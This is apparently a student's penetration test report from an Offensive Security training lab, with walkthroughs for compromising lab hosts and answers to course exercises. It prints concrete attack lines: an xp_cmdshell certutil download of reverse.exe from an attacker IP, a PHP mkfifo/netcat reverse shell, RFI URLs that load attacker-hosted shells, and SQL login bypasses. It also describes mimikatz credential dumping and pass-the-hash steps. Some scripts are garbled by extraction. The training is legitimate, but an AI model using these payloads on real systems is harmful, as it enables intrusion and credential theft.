OFFENSIVE SECURITY

Penetration Test Report for

Internal Lab
v.2.0

Copyright © 2022 Offensive Security Ltd. All rights reserved.

No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any
broadcast for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without
prior written permission from Offensive Security.

Table of Contents
Offensive Security Lab Penetration Test Report 2
1. Objective 2
2. Lab Network 2
3. Exercises 53
1 | Page
Offensive Security Lab Penetration Test Report
1. Objective
OS-was tasked with performing an internal penetration test towards Offensive Security
Labs. An internal penetration test is a dedicated attack against internally connected
systems. The focus of this test is to perform attacks, similar to those of a hacker and
attempt to infiltrate Offensive Security’s internal lab systems – the THINC.local and
xor.com domain. The overall objective was to evaluate the network, identify systems,
and exploit flaws while reporting the findings back to Offensive Security.

When performing the internal penetration test, there were several alarming
vulnerabilities that were identified on Offensive Security’s network. When performing the
attacks, OS- was able to gain access to multiple machines, primarily due to outdated
patches and poor security configurations. During the testing, OS- had administrative
level access to multiple systems. All systems were successfully exploited and access
granted.

2. Lab Network
Offensive Security Complete Guide machines (alpha and beta) may not be included in
your lab report, they are for demonstration purposes only.

2 | Page
10.11.1.222

Enumeration
Initial nmap scan reveals several ports from which our attack surface is on ports 1512
which runs oracle tns listner and the other one is port 8080 which is an apache tomcat
webserver.

3 | Page
Directory bruteforcing apache tomcat reveals /blog/login.jsp directory which is a login
page

4 | Page
Initial access

Passing single quote in the username field gives out an error page with oraclesql
database username,password and database name.

5 | Page
Using these credentials we attempt to log into oracle-tns listener using sqlplus and we
get a sql shell.
Using this sql shell we first dump the table name and then usernames and passwords of
users and admin.
To dump table names we use the query “SELECT owner, table_name FROM all_tables;”

6 | Page
2 tables named WEB_USERS and WEB_ADMIN has user and admin credentials
respectively.

7 | Page
Cracking the admin credential by using the web application crackstation.net reveals the
admin password to be “adminadmin”

Using the web_User credentials we log into the login page on /blog/login.jsp
Username: eric
Password: thisismypassword

Admin login buttion on the page redirects us to /blog/adminlogin.jsp.

8 | Page
We use the credentials for admin from the WEB_ADMIN table we dumped earlier.
Username: admin
Password: adminadmin
After logging in we get a portal to upload files. Taking this feature at our advantage we
upload jsp reverse shell

9 | Page
This jsp reverse shell can be found out at
https://raw.githubusercontent.com/LaiKash/JSP-Reverse-and-Web-Shell/main/shell.jsp.

Uploading the reverse the shell.

10 | Page
After Uploading the reverse shell we get code execution on the server. Through this
code execution we get reverse shell as nt authority\system by injecting powershell
base64 encoded payload.

Post-Exploitation

11 | Page
10.11.1.128

Enumeration

Initial nmap scan reveals several ports and port 4167 on which iis http server is running,
this will be our entry point.

12 | Page
Directory bruteforcing reveals /login.asp directory which has a login panel.

13 | Page
Initial Foothold

The login panel is vulnerable to sql injection attack by using the “’ OR 1=1;--” in the
username and password fields we can bypass the login screen.

14 | Page
The 2 input fields “Artist Name” and “Song Name” are also vulnerable to sql injection. By
enabling xp_cmdshell by these set of payloads:
‘EXEC sp_configure 'show advanced options',1;--
‘RECONFIGURE;--
‘EXEC sp_configure 'xp_cmdshell',1;--
‘RECONFIGURE;--
We can get code execution on the server.
To get Remote code execution we first create a reverse shell executable using
msfvenom.

And start a python http.server

15 | Page
To get reverse shell we execute the following payload in one of the input fields on the
webpage:
alice' EXEC xp_cmdshell 'certutil.exe -urlcache -f http://192.168.119.148/reverse.exe
reverse.exe';--

And we get a reverse shell as the nt authority\system

Post-Exploitation

16 | Page
10.11.1.133
Enumeration

Bruteforcing directories shows test.asp file.

Browsing and inspecting test.asp in browser shows it imports a script from hidd3nscript.

Searching hidd3n-script directory on the server shows obfuscated javascript code.

17 | Page
De-obfuscating the code from deobfuscate.io shows the contents of the code.

18 | Page
After understanding the code we can infer that it just creates a image tag with source
1f2e73705207bdd6467e109c1606ed29-21213/offsecphun1.gif.

19 | Page
The deobfuscated code contains names of lots of other gif, png and bmp files. Trying
each one of them and we land on offsecphun5.bmp. after searching this we get
redirected to http://10.11.1.133/1f2e73705207bdd6467e109c1606ed29-
21213/111111111/1.jpeg

20 | Page
Bruteforcing directories /1f2e73705207bdd6467e109c1606ed29-21213/111111111/

Reveals index folder with a login page.

21 | Page
Initial Access

During dirsearch there was a mention of install.txt browsing it shows a installation text
file.

Form the file just a simple google search about SiTeFiLo exploits reveals a EDB exploit.
Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion -
PHP webapps Exploit (exploit-db.com)

22 | Page
Browsing for slog_users.txt reveals userid’s and passwords.

Using the other rfi vulnerability. We can execute a php reverse shell on the server.

23 | Page
Got reverse shell as user www-data

Enumerating users from /etc/passwd file reveals there Is a user named kibosh who’s
password was in the password file from above.

24 | Page
Changing the user from www-data to kibosh using the su command and entering the
password in the password file grants us shell as kibosh

Privilege-Escalataion
25 | Page
After further enumeration it Is found out that kibosh has rights to run ALL:ALL
commands.
So abusing this privilege we get root shell by sudo su.

Post exploitation.

10.11.1.101
26 | Page
Initial enumeration

Searching for 10.11.1.101 in the browser shows a webpage with tryharder images. On
the contact us page there are names of people working in the company in different
positions. There are names, Emails and birth years of the employees.

27 | Page
Directory burteforcing shows /passwords/ directory on the webserver.

28 | Page
Exploiring the directory reveals 4 files which have names of the employees as same as
on the contact us page.

29 | Page
Opening Alfred-pas.html reveals a page with passwordbox.

The password hint says that year of birth is the password so going back at the contact
us page we can see that Alfred was born in 1988. So guessing the password “1988”
gives us access to the password protected content.

30 | Page
On this page we can see that there is a ssh server password “IHopeThisDoesNotExpire”
disclosed for user Alfred. Using these credentials we loginto the server as Alfred
successfully.

Initial Access

But our shell is restricted. To escape restricted shell we use the “-t bash --noprofile” flag.

On the home directory there is a README file. This file mentions that there is maybe a
docker container running on the system.

31 | Page
Privilege Escalation
Running linpeas.sh privilege escalation script we can see that the /var/run/docker.sock
file is writable which can pave our way to root account.

Mounting the socket and and running as localhost in system ubuntu with chrooting back
into hosts “/bin/bash” we get root privileges.

Post-Exploitation

32 | Page
10.11.1.115
Nmap scan reveals ports 21,22,80,111,139,143,199,443,3306,32768.

33 | Page
Enumerating port 139 with metasploit’s auxiliary/scanner/smb/smb_version reveals the
host is running samba 2.2.7a

Initial Access
Samba 2.2.7a is vulnerable to Remote buffer overflow vulnerability which has a EDB
exploit available Samba < 2.2.8 (Linux/BSD) - Remote Code Execution - Multiple remote
Exploit (exploit-db.com) CVE:2003-0201
Exploiting the vulnerability gives us revershell from root account.

34 | Page
Post exploitation

35 | Page
10.11.1.116
Nmap enumeration shows port 80 open along with 21,22,110 and 143. Port 80 runs
apache webserver

Bruteforcing apachewebserver directories we get /administrator/ in which there is Cuppa

cms and /db in which there phpliteadmin.php, which Is phpLiteAdmin v1.9.3, it is used to
handle sqlite database.

36 | Page
The password for phpliteadmin is the default password “admin”. Upon logging in we can
create a php file with our desired payload to get reverse shell as described in this exploit
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit
(exploitdb.com) EDB-ID:24044

In this exploit we forst create a database and insert a table into it, after that in the table
we insert out php code to get reverse shell. In my case I used “<?php echo
shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.215 139
>/tmp/f");?>”.
Even after creating this database file in order to get reverse shell we must be able to
browse this file but, unfortunately this file is not in the webserver’s directory. In order to

37 | Page
access this database file we must be able to chain a Remote/Local File Inclusion
vulnerability to access this file.
So, to get reverse shell we chain a LFI vulnerability in “cuppa cms Cuppa CMS -
'/alertConfigField.php' Local/Remote File Inclusion - PHP webapps Exploit (exploitdb.com)
EDB-ID:
25971.
We can see that the path to our revershell file is

So in order to access the file and get reverse shell we use payload
:http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=/usr/local/databas
es/hack.php:
And we get a reverse shell as www-data

Further enumeration reveals that the host is using OS

Which is vulnerable to a kernel exploit that triggers local privilege escalation

vulnerability.
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation - Linux local Exploit
(exploit-db.com) CVE:2017-16995

Downloading, compiling and running the exploit on the host allows us to gain root
privileges.

38 | Page
Post-Exploitation

39 | Page
40 | Page
10.11.1.120-123
This is a active directory network of machines with the domain name xor.com. In this set
10.11.1.120 is the domain controller and the other 3 machines are clients. Out of these
3 clients we get our initial access from 10.11.1.123 and then move laterally to
compromise the domain controller.

10.11.1.123

Enumeration
Initial Nmap scan reveals port 80 which will be of our interest is open.

Directory brute forcing on the http server on port 80 reveals /books directory

41 | Page
Upon browsing the /books directory in our web browser we get a welcome page of
“bizuno erp system”

42 | Page
Initial Access

Guessing the credentials of this erp username as “admin@xor.com” and password as

“admin”
We get logged in.

43 | Page
A quick google search reveals that bizuno library 3.1.7 is vulnerable to authenticated
remote code execution.
PhreeBooks 5.2.3 ERP - Remote Code Execution (2) - PHP webapps Exploit
(exploitdb.com) EDB-ID:
49524
Executing the exploit we get code execution on 10.11.1.123

44 | Page
Reverse shell is gained through powershell base64 encoded payload. Upon gaining
reverse shell further enumeraton reveals that there is cached tgs ticket for mssql server
running on 10.11.1.121.
To dump these hashesh we use invoke-Kerberos.ps1 script.

45 | Page
Cracking this hash using hashcat we get the password a “shantewhite”

46 | Page
Post-exploitation

47 | Page
10.11.1.121

Initial Access
Wmiexec to 10.11.1.121 as sqlServer we get shell on 10.11.1.121. Upon further
enumeration by mimikatz we attempt to dump logoncredentials. And we get hash for
daisy.

48 | Page
Post-exploitation

49 | Page
10.11.1.122

After dumping NTLM hash of daisy. We attempt passthehash attack on 10.11.1.122 as

user daisy by using wmiexec.py.
After getting access to 10.11.1.122 as daisy we further enumerate and dump
logonpasswords again using mimikatz, and we get NTLM hash of user David.

50 | Page
Post-Exploitation

51 | Page
10.11.1.120 the domain controller.

Initital enumeration
Nmap scan reveals that this is the domain controller, the scan of port 3389 shows the
common name is xor-dc01.xor.com

52 | Page
Using the David user’s NTLM hash from 10.11.1.121, we attempt to loginto the domain
controller using wmiexec.py and get shell as user David who is local administrator on
the domain controller

53 | Page
Post-Exploitiation

54 | Page
3. Exercises

2.4.3.4 Exercises
1. Use man to look at the man page for one of your preferred commands.

2. Use man to look for a keyword related to file compression.

55 | Page
3. Use which to locate the pwd command on your Kali virtual

4. Use locate to locate wce32.exe on your Kali virtual machine.

5. Use find to identify any file (not directory) modified in the last day, NOT owned by the root user
and execute ls -l on them. Chaining/piping commands is NOT allowed!

56 | Page
 2.5.3 Exercises (Reporting is not required for these
exercises) 2.6.6.1 Exercises (Reporting is not required
for these exercises)

3.1.3.1 Exercises
1. Inspect your bash history and use history expansion to re-run a command from it.

57 | Page
2. Execute different commands of your choice and experiment browsing the history
through the shortcuts as well as the reverse-i-search facility.

58 | Page
3.2.5.1 Exercises

1. Use the cat command in conjunction with sort to reorder the content of the /etc/passwd file on
your Kali Linux system.

2.Redirect the output of the previous exercise to a file of your choice in your home
directory

59 | Page
3.3.5.1 Exercises

1. Using /etc/passwd, extract the user and home directory fields for all users on your Kali machine
for which the shell is set to /bin/false. Make sure you use a Bash one-liner to print the output to
the screen.

2. Copy the /etc/passwd file to your home directory (/home/kali).

3. Use cat in a one-liner to print the output of the /kali/passwd and replace all
instances of the “Gnome Display Manager” string with “GDM”.

60 | Page
3.5.3.1 Exercises
1. Download the archive from the following URL
https://offensive-security.com/pwkfiles/scans.tar.gz
2. This archive contains the results of scanning the same target machine at different
times. Extract the archive and see if you can spot the differences by diffing the scans.

3.6.3.1 Exercises

1. Find files that have changed on your Kali virtual machine within the past 7 days by running a
specific command in the background.
61 | Page
2. Re-run the previous command and suspend it; once suspended, background it.

3. Bring the previous background job into the foreground.

62 | Page
3. Start the Firefox browser on your Kali system. Use ps and grep to identify Firefox’s PID.

4. Terminate Firefox from the command line using its PID.

3.7.2.1 Exercises

1. Start your apache2 web service and access it locally while monitoring its access.log file in
realtime.

2. Use a combination of watch and ps to monitor the most CPU-intensive processes on your Kali
machine in a terminal window; launch different applications to see how the list changes in real
time
Command:- watch -c -n 1 ps -eo pid,ppid,%mem,%cpu,comm --sort=-%cpu
63 | Page
3.8.3.1 Exercise

1. Download the PoC code for an exploit from https://www.exploit-db.com using curl, wget, and
axel, saving each download with a different name

64 | Page
3.9.3.1 Exercises
1. Create an alias named “..” to change to the parent directory and make it persistent across
terminal sessions.

2. Permanently configure the history command to store 10000 entries and include the full date
in its output.

65 | Page
4.2.4.1 Exercises
1. Use socat to transfer powercat.ps1 from your Kali machine to your Windows system. Keep the
file on your system for use in the next section.

• Listener started

• Establishing connection

2.Use socat to create an encrypted reverse shell from your Windows system to
your Kali machine.
• Generating certificate and key files on Kali linux(attacker) and combining them to
.pem file

66 | Page
 • Starting Listener

• Initiating connection from target machine(windows) and receiving reverse shell

3. Create an encrypted bind shell on your Windows system. Try to connect to it from Kali
without encryption. Does it still work?
• Starting Listener on target(Windows).
67 | Page
 • Attempting to connect to the encrypted bind shell without encryption from
attacker(Kali Linux).

• Conclusion: Doesn’t Connect to the encrypted bind shell.

4. Make an unencrypted socat bind shell on your Windows system. Connect to the shell using
Netcat. Does it work?
• Creating a Bindshell listener using socat on Target(Windows).

• Attempting to connect to the socat bindshell listener using netcat from attacker(Kali
Linux) machine.

68 | Page
 • Conclusion: Connection was successful.

4.3.8.1 Exercises
1. Use PowerShell and powercat to create a reverse shell from your Windows system to your
Kali machine.
• Powershell Reverse shell

• Powercat reverse shell

69 | Page
2. Use PowerShell and powercat to create a bind shell on your Windows system and connect to
it from your Kali machine. Can you also use powercat to connect to it locally?
• Powershell Bind shell

• Powercat Bind shell

• Can you also use powercat to connect to it locally?

• Ans: NO
70 | Page
3. Use powercat to generate an encoded payload and then have it executed through
powershell. Have a reverse shell sent to your Kali machine, also create an encoded bind shell
on your Windows system and use your Kali machine to connect to it.

• Powercat Encoded Reverse shell payload

71 | Page
72 | Page
 • Powercat encoded bind shell

4.4.5.1 Exercises
1. Use Wireshark to capture network activity while attempting to connect to
10.11.1.217 on port 110 using Netcat, and then attempt to log into it.

73 | Page
2. Read and understand the output. Where is the three-way handshake happening? Where is
the connection closed?
• Three way Handshake happens at the very first 3 packets

• Last 3 packets before closing connection

3. Follow the TCP stream to read the login attempt.

74 | Page
4. Use the display filter to only monitor traffic on port 110. 5. Run a new session, this time using
the capture filter to only collect traffic on port 110

75 | Page
5. Run a new session, this time using the capture filter to only collect traffic on port 110.

76 | Page
4.5.2.1 Exercises

1. Use tcpdump to recreate the Wireshark exercise of capturing traffic on port 110.

77 | Page
2.Use the -X flag to view the content of the packet. If data is truncated, investigate
how the -s flag might help.
SOL:-Here using the -X option we can see the packets in hex and ascii and with the -s flag we can
reduce the data that is being truncated in the STDOUT -s flag(snaplen) has to be paired with a
numerical value ranging from 0-65535 for fine control over how much data will be truncated. 0
means no truncation of data.

3.Find all ‘SYN’, ‘ACK’, and ‘RST’ packets in the password_cracking_filtered.pcap

file.
SYN packets

78 | Page
ACK packets

79 | Page
RST packets

4. An alternative syntax is available in tcpdump where you can use a more user-friendly filter to
display only ACK and PSH packets. Explore this syntax in the tcpdump manual by searching
for “tcpflags”. Come up with an equivalent display filter using this syntax to filter ACK and
PSH packets.

Command: tcpdump -A 'tcp[tcpflags] & (tcp-ack|tcp-push) != 0' -r

password_cracking_filtered.pcap -s 0

80 | Page
5.7.3.1 Exercises
1. Research Bash loops and write a short script to perform a ping sweep of your target IP
range of 10.11.1.0/24.

script:

#!/bin/bash

for ((i=0;i<=254;i++));

ip=10.11.1.$i ping -c 1 -w 1 $ip | grep "64 bytes" | cut -d " "

-f 4 | tr -d ":"

81 | Page
2. Try to do the above exercise with a higher-level scripting language such as Python, Perl,
or Ruby. Script(python): #!/usr/bin/python import os

for i in range(1,256):

#str(i) ip=("10.11.1.%s" %i) response = os.system("ping

-c 1 -w 1 %s > /dev/null" %ip) if response == 0: print("%s

UP" %ip) else:

print("%s No response" %ip)

print("Ping sweep complete")

82 | Page
3. Use the practical examples in this module to help you create a Bash script that extracts
JavaScript files from the access_log.txt file
(http://www.offensive-security.com/pwkfiles/access_log.txt.gz). Make sure the file
names DO NOT include the path, are unique, and are sorted.
Script:- cat access_log.txt | grep .js | cut -d '/' -f 5 | awk '{print $1}' | sed '/.css/d' | sort u

4. Re-write the previous exercise in another language such as Python, Perl, or Ruby.

83 | Page
 6.3.1.1 Exercise

1.Use the whois tool in Kali to identify the name servers of MegaCorp One.

6.4.1.1 Exercises
1. Who is the VP of Legal for MegaCorp One and what is their email address?

84 | Page
3. Use Google dorks (either your own or any from the GHDB) to search www.megacorpone.com for
interesting documents.

85 | Page
4. What other MegaCorp One employees can you identify that are not listed on
www.megacorpone.com?

86 | Page
Names: Gabriel cook, William Adler, Javier Ruiz.

6.5.1.1 Exercise

1. Use Netcraft to determine what application server is running on www.megacorpone.com.

87 | Page
 6.6.1.1 Exercise (Reporting is not required for this
exercise+)

6.7.1.1 Exercise
1. Search Megacorpone’s GitHub repos for interesting or sensitive information.

6.12.1.1 Exercises

1. Use theHarvester to enumerate emails addresses for megacorpone.com.

88 | Page
2. Experiment with different data sources (-b). Which ones work best for you? Ans:
Google works best.

89 | Page
6.13.2.1 Exercise
1. Use any of the social media tools previously discussed to identify additional
MegaCorp One employees.

7.1.6.3 Exercises
1. Find the DNS servers for the megacorpone.com domain.

2.Write a small script to attempt a zone transfer from megacorpone.com using a

higherlevel scripting language such as Python, Perl, or Ruby. Script:
#!/bin/python3
# A Simple function that finds NS records, resolves their IP, and attempts a
DNS Zone Transfer
import dns.zone import
dns.resolver
ns_servers = [] def
90 | Page
dns_zone_xfer(address)
:
ns_answer = dns.resolver.query(address, 'NS')
for server in ns_answer:
print("[*] Found NS: {}".format(server))
ip_answer = dns.resolver.query(server.target, 'A')
for ip in ip_answer:
print("[*] IP for {} is {}".format(server, ip))
try:
zone = dns.zone.from_xfr(dns.query.xfr(str(ip), address))
for host in zone:
print("[*] Found Host: {}".format(host))
except Exception as e:
print("[*] NS {} refused zone transfer!".format(server))
continue

dns_zone_xfer('megacorpone.com')

# end of script

3.Recreate the example above and use dnsrecon to attempt a zone transfer from
megacorpone.com.
root@stu-1 ~/pen200/exercise dnsrecon -d megacorpone.com
-axfr
[*] std: Performing General Enumeration against:
megacorpone.com...
[*] Checking for Zone Transfer for megacorpone.com name servers
[*] Resolving SOA Record [+] SOA
ns1.megacorpone.com 51.79.37.18
[*] Resolving NS Records
[*] NS Servers found:
[+] NS ns1.megacorpone.com 51.79.37.18
[+] NS ns3.megacorpone.com 66.70.207.180
[+] NS ns2.megacorpone.com 51.222.39.63
[*] Removing any duplicate NS server IP Addresses...
[*]
[*] Trying NS server 51.79.37.18
[+] 51.79.37.18 Has port 53 TCP Open
[-] Zone Transfer Failed (Zone transfer error: REFUSED)
[*]

91 | Page
[*] Trying NS server 51.222.39.63
[+] 51.222.39.63 Has port 53 TCP Open
[+] Zone Transfer was successful!!
[*] NS ns1.megacorpone.com 51.79.37.18
[*] NS ns2.megacorpone.com 51.222.39.63 [*]
NS ns3.megacorpone.com 66.70.207.180
[*] TXT Try Harder
[*] TXT
google-site-verification=U7B_b0HNeBtY4qYGQZNsEYXfCJ32hMNV3GtC0wWq5
pA
[*] MX @.megacorpone.com fb.mail.gandi.net 217.70.178.216
[*] MX @.megacorpone.com fb.mail.gandi.net 217.70.178.217
[*] MX @.megacorpone.com fb.mail.gandi.net 217.70.178.215 [*]
MX @.megacorpone.com spool.mail.gandi.net 217.70.178.1
[*] A admin.megacorpone.com 51.222.169.208
[*] A beta.megacorpone.com 51.222.169.209
[*] A fs1.megacorpone.com 51.222.169.210
[*] A intranet.megacorpone.com 51.222.169.211
[*] A mail.megacorpone.com 51.222.169.212
[*] A mail2.megacorpone.com 51.222.169.213
[*] A ns1.megacorpone.com 51.79.37.18
[*] A ns2.megacorpone.com 51.222.39.63
[*] A ns3.megacorpone.com 66.70.207.180
[*] A router.megacorpone.com 51.222.169.214
[*] A siem.megacorpone.com 51.222.169.215
[*] A snmp.megacorpone.com 51.222.169.216
[*] A support.megacorpone.com 51.222.169.218
[*] A syslog.megacorpone.com 51.222.169.217
[*] A test.megacorpone.com 51.222.169.219
[*] A vpn.megacorpone.com 51.222.169.220
[*] A www.megacorpone.com 149.56.244.87 [*]
A www2.megacorpone.com 149.56.244.87
[*]
[*] Trying NS server 66.70.207.180
[+] 66.70.207.180 Has port 53 TCP Open
[-] Zone Transfer Failed (Zone transfer error: REFUSED)
[*] Checking for Zone Transfer for megacorpone.com name servers
[*] Resolving SOA Record [+] SOA
ns1.megacorpone.com 51.79.37.18
92 | Page
[*] Resolving NS Records
[*] NS Servers found:
[+] NS ns1.megacorpone.com 51.79.37.18
[+] NS ns3.megacorpone.com 66.70.207.180
[+] NS ns2.megacorpone.com 51.222.39.63
[*] Removing any duplicate NS server IP Addresses...
[*]
[*] Trying NS server 51.79.37.18
[+] 51.79.37.18 Has port 53 TCP Open
[-] Zone Transfer Failed (Zone transfer error: REFUSED)
[*]
[*] Trying NS server 51.222.39.63
[+] 51.222.39.63 Has port 53 TCP Open
[+] Zone Transfer was successful!!
[*] NS ns1.megacorpone.com 51.79.37.18
[*] NS ns2.megacorpone.com 51.222.39.63 [*]
NS ns3.megacorpone.com 66.70.207.180
[*] TXT Try Harder
[*] TXT
google-site-verification=U7B_b0HNeBtY4qYGQZNsEYXfCJ32hMNV3GtC0wWq5
pA
[*] MX @.megacorpone.com fb.mail.gandi.net 217.70.178.216
[*] MX @.megacorpone.com fb.mail.gandi.net 217.70.178.215
[*] MX @.megacorpone.com fb.mail.gandi.net 217.70.178.217 [*]
MX @.megacorpone.com spool.mail.gandi.net 217.70.178.1
[*] A admin.megacorpone.com 51.222.169.208
[*] A beta.megacorpone.com 51.222.169.209
[*] A fs1.megacorpone.com 51.222.169.210
[*] A intranet.megacorpone.com 51.222.169.211
[*] A mail.megacorpone.com 51.222.169.212
[*] A mail2.megacorpone.com 51.222.169.213
[*] A ns1.megacorpone.com 51.79.37.18
[*] A ns2.megacorpone.com 51.222.39.63
[*] A ns3.megacorpone.com 66.70.207.180
[*] A router.megacorpone.com 51.222.169.214
[*] A siem.megacorpone.com 51.222.169.215
[*] A snmp.megacorpone.com 51.222.169.216
[*] A support.megacorpone.com 51.222.169.218
[*] A syslog.megacorpone.com 51.222.169.217
93 | Page
[*] A test.megacorpone.com 51.222.169.219
[*] A vpn.megacorpone.com 51.222.169.220
[*] A www.megacorpone.com 149.56.244.87 [*]
A www2.megacorpone.com 149.56.244.87
[*]
[*] Trying NS server 66.70.207.180
[+] 66.70.207.180 Has port 53 TCP Open
[-] Zone Transfer Failed (Zone transfer error: REFUSED)
[-] DNSSEC is not configured for megacorpone.com
[*] SOA ns1.megacorpone.com 51.79.37.18
[*] NS ns1.megacorpone.com 51.79.37.18
[*] NS ns3.megacorpone.com 66.70.207.180
[*] NS ns2.megacorpone.com 51.222.39.63
[*] MX mail.megacorpone.com 51.222.169.212
[*] MX mail2.megacorpone.com 51.222.169.213
[*] MX spool.mail.gandi.net 217.70.178.1
[*] MX fb.mail.gandi.net 217.70.178.215
[*] MX fb.mail.gandi.net 217.70.178.216
[*] MX fb.mail.gandi.net 217.70.178.217 [*]
TXT megacorpone.com
google-site-verification=U7B_b0HNeBtY4qYGQZNsEYXf
CJ32hMNV3GtC0wWq5pA
[*] TXT megacorpone.com Try Harder
[*] Enumerating SRV Records
[+] 0 Records Found
[*] Saving records to XML file: fr

7.2.2.9 Exercises
1. Use Nmap to conduct a ping sweep of your target IP range and save the output to a file.
Use grep to show machines that are online.
94 | Page
2.Scan the IP addresses you found in exercise 1 for open webserver ports. Use
Nmap to find the webserver and operating system versions.

95 | Page
3. Use NSE scripts to scan the machines in the labs that are running the SMB service.

96 | Page
4. Use Wireshark to capture a Nmap connect and UDP scan and compare it against the Netcat
port scans. Are they the same or different?

Ans: Netcat port scan and Nmap connect scan are the same because both scans perform
complete connection that is SYN-SYN/ACK-ACK with the target which generates more traffic
than nmap stealth scan.

5. Use Wireshark to capture a Nmap SYN scan and compare it to a connect scan and identify
the difference between them.

Ans: Nmap SYN(stealth scan) and nmap connect scan have one major
difference. In stealth scan connection made with the target is incomplete
SYNSYN/ACK-RST which in turn reduces network traffic and speeds up the
scan.
Where as in connect scan a complete connection is made
ACK-SYN/ACKACK which generates a lot of network taffic and slows down
the scanning process.

97 | Page
 7.3.2.1 Exercises
1. Use Nmap to make a list of the SMB servers in the lab that are running
Windows.

2.Use NSE scripts to scan these systems for SMB vulnerabilities.

3. Use nbtscan and enum4linux against these systems to identify the types of data you can obtain
from different versions of Windows

nbtscan

98 | Page
Enum4linux

7.4.2.1 Exercises

1. Use Nmap to make a list of machines running NFS in the labs.

99 | Page
2. Use NSE scripts to scan these systems and collect additional information about accessible
shares.

100 | Page
 7.5.1.1 Exercises
1. Search your target network range to see if you can identify any systems that respond to the

SMTP VRFY command.

Nmap scan using a script that sends VRFY command

2. Try using this Python code to automate the process of username discovery using a text file

with usernames as input.

Usernames file

101 | Page
102 | Page
7.6.3.6 Exercises

1. Scan your target network with onesixtyone to identify any SNMP servers.

2. Use snmpwalk and snmp-check to gather information about the discovered targets.

103 | Page
104 | Page
 8.2.4.1 Exercises
1. Follow the steps above to create your own unauthenticated scan of Gamma.
Steps:

1. Defining target

2. Configuring Scan Definitions

105 | Page
 3. Launching Scan
3. Run the scan with Wireshark open and identify the steps the scanner performed to
completed the scan. Ans:

As we can see in the screenshot below Nessus first scans for common ports.

106 | Page
After discovering common open ports the scanner then enumerates services on the
target machine automatically. In the screenshot below we can see that the scanner
attempts to enumerate Netbios -ssn and SMB service.

107 | Page
 After that the scanner performs full port scanning on the target as we
can see from the screenshot below there are a lot of TCP SYN packets
being sent to the target.

Now as we can see in the screenshot below the scanner has discovered open port 80
and is now scanning the HTTP server on port 80 for vulnerabilities.

108 | Page
 4. Review the results of the scan.

The Scan has discovered a lot of information some medium vulnerablites and some
Critical Vulnerabilities related to CGI bin attacks.

109 | Page
8.2.5.1 Exercises
1. Follow the steps above to create your own authenticated scan of your Debian client.

110 | Page
2. Review the results of the scan.

111 | Page
8.2.6.1 Exercises
1. Follow the steps above to create your own individual scan of Beta.

112 | Page
113 | Page
114 | Page
 3. Run Wireshark or tcpdump during the individual scan. What other ports does Nessus scan? Why
do you think Nessus scans other ports?

Many plugins check the port state of hardcoded default ports before connecting to them.
Ports outside of the port scan range would have an unknown state because they weren't scanned. By
default, get_port_state() will return TRUE when the port state is unknown. This will result in the
connection being attempted. There is an option in the policy settings "Consider unscanned ports as
closed" that will cause get_port_state() to return FALSE when the state is unknown. This option will
prevent connection attempts to ports outside the port range (as long as the connection has a state
check before it).
4. Review the results of the scan.

115 | Page
8.3.1.1 Exercise
1. Find an NSE script similar to the NFS Exported Share Information Disclosure that
was executed in the “Scanning with Individual Nessus Plugins” section. Once found, run
the script against Beta in the PWK labs.

116 | Page
117 | Page
9.3.3.1 Exercise
1. Spend some time reviewing the applications available under the Web Application
Analysis menu in Kali Linux. nikto

Burpsuit

118 | Page
Dirbuster

119 | Page
9.4.1.2 Exercises
1. Use Burp Intruder to gain access to the phpMyAdmin site running on your Windows
10 lab machine.
Inspecting site source code for set_session parameter

120 | Page
Setting delimiter

121 | Page
Assigning recursive grep to payload

122 | Page
Running intruder

123 | Page
3. Insert a new user into the “users” table

124 | Page
9.4.2.5 Exercises
1. Exploit the XSS vulnerability in the sample application to get the admin cookie and
hijack the session. Remember to use the PowerShell script on your Windows 10 lab
machine to simulate the admin login. Injected payload.

Using admin_login.ps1 to simulate login.

Captured Session cookie

125 | Page
Adding the admin cookie to our session

126 | Page
Session Hijacked

2. Consider what other ways an XSS vulnerability in this application might be used for attacks.

Destruction of key site elements.

127 | Page
 As you can see in the screenshot above the option to create a comment is destroyed.

3. Does this exploit attack the server or clients of the site?

Ans: This attack affects the clients of the site.

9.4.3.2 Exercise

128 | Page
1. Exploit the directory traversal vulnerability to read arbitrary files on your Windows 10 lab
machine.

129 | Page
9.4.4.5 Exercises
1. Obtain code execution through the use of the LFI attack. Sent payload.

Code execution.

130 | Page
2. Use the code execution to obtain a full shell.

Created a php webshell payload file with msfvenom and started a smbserver

131 | Page
Transferred payload to target via smb

132 | Page
Using LFI vulnerability to execute webshell

133 | Page
Got shell as student

9.4.4.7 Exercises
1. Exploit the RFI vulnerability in the web application and get a shell.

Started a python httpserver on port 80 and created a php webshell

134 | Page
135 | Page
 Added url of my machine http://192.168.119.123/shell.php in the file parameter and got the
shell.

3. Using /menu2.php?file=current_menu as a starting point, use RFI to get a shell.

Started a python httpserver on port 80 and created a php webshell

136 | Page
Upon making the request we can see in the screen shot below that it is not able to find the file
even though I have hosted the file on my python server

137 | Page
Upon looking at the python server STDOUT we can see that request is being made by the target
to the attacker machine but the request has repeated .php extension

138 | Page
So now we make a request to attacker machine without the .php file extension

http://192.168.123.10/menu2.php?file=http://192.168.119.123/shell and we

receive a shell

139 | Page
4. Use one of the webshells included with Kali to get a shell on the Windows 10 target.

Using the webshell in “/usr/share/webshells/php/qsd-php-backdoor.php”

140 | Page
9.4.4.10 Exercises
1. Exploit the LFI vulnerability using a PHP wrapper.

141 | Page
2. Use a PHP wrapper to get a shell on your Windows 10 lab machine.

Using the php wrapper with powershell base64 encoded payload

142 | Page
9.4.5.4 Exercises
1. Interact with the MariaDB database and manually execute the commands required to
authenticate to the application. Understand the vulnerability.
Executing the sql query used by the webapp at the time of login it displays table.

143 | Page
Upon adding a double quote in the username field after admin and adding ‘OR 1=1 #’ to
make the statement true and the further become a comment . We are able to dump the
whole table.

3.SQL inject the username field to bypass the login process.

144 | Page
145 | Page
 3. Why is the username displayed like it is in the web application once the authentication
process is bypassed?
